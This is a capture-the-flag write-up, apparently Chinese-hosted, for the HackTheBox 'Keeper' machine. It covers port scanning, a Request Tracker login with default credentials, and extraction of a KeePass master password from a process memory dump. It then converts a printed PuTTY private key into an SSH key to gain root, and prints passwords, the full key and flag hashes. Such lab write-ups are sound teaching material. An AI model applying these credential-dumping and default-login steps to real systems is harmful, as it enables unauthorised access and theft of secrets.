Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.227 | TCP:22,80 |
$ ip='10.10.11.227'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Login
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Request Tracker (RT)
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图](https://img.4awl.net/img/e9/76daa85359ff45dc4f21f6218cc287.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图")
# echo '10.10.11.227 tickets.keeper.htb'>>/etc/hosts
http://tickets.keeper.htb/
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图1](https://img.4awl.net/img/d1/08d555c472c0f767136288a6784de0.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图1")
username:rootpassword:password
http://tickets.keeper.htb/rt/
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图2](https://img.4awl.net/img/d0/eb6c2100c10adf8bdf7d078aac1de7.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图2")
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图3](https://img.4awl.net/img/be/0c0bec62114ec927d0e3993278bf0e.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图3")
password:Welcome2023!
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图4](https://img.4awl.net/img/db/4dd52e127adfa106d9430208c2fe9c.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图4")
User.txt
3e065105fb5ec6a9d4d4875f1fa99185
Privilege Escalation:Extract the master password from the KeePass process remnants && PUTTY PPK to id_rsa
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图5](https://img.4awl.net/img/81/914b35214a5aedec7c4512891131ba.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图5")
$ scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip /tmp/
https://github.com/vdohney/keepass-password-dumper
#!/bin/bash
wget https://packages.microsoft.com/config/debian/11/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
dpkg -i packages-microsoft-prod.deb
apt update
apt install -y dotnet-sdk-7.0
dotnet --version
1.获取主密钥
# dotnet run KeePassDumpFull.dmp
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图6](https://img.4awl.net/img/e4/eed9376cd7f4a2b23b7440ed0d4b4c.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图6")
dgrød med fløde
2.passcodes.kdbx破译
https://app.keeweb.info/
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图7](https://img.4awl.net/img/ef/f83a7756fb632f053006268f1ad946.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图7")
rødgrød med fløde
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图8](https://img.4awl.net/img/09/c73646eb6a68b397da3621616f7310.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图8")
3.将ppk转为id_rsa私钥
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
$ puttygen ppk -O private-openssh -o id_rsa
$ ssh root@10.10.11.227 -i id_rsa
![[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图9](https://img.4awl.net/img/23/9a0bcda699a2aa2c08052fbe6f7f7a.jpg "[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转i…插图9")
Root.txt
00172c33f60bd92c400e0bd2825d1301
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
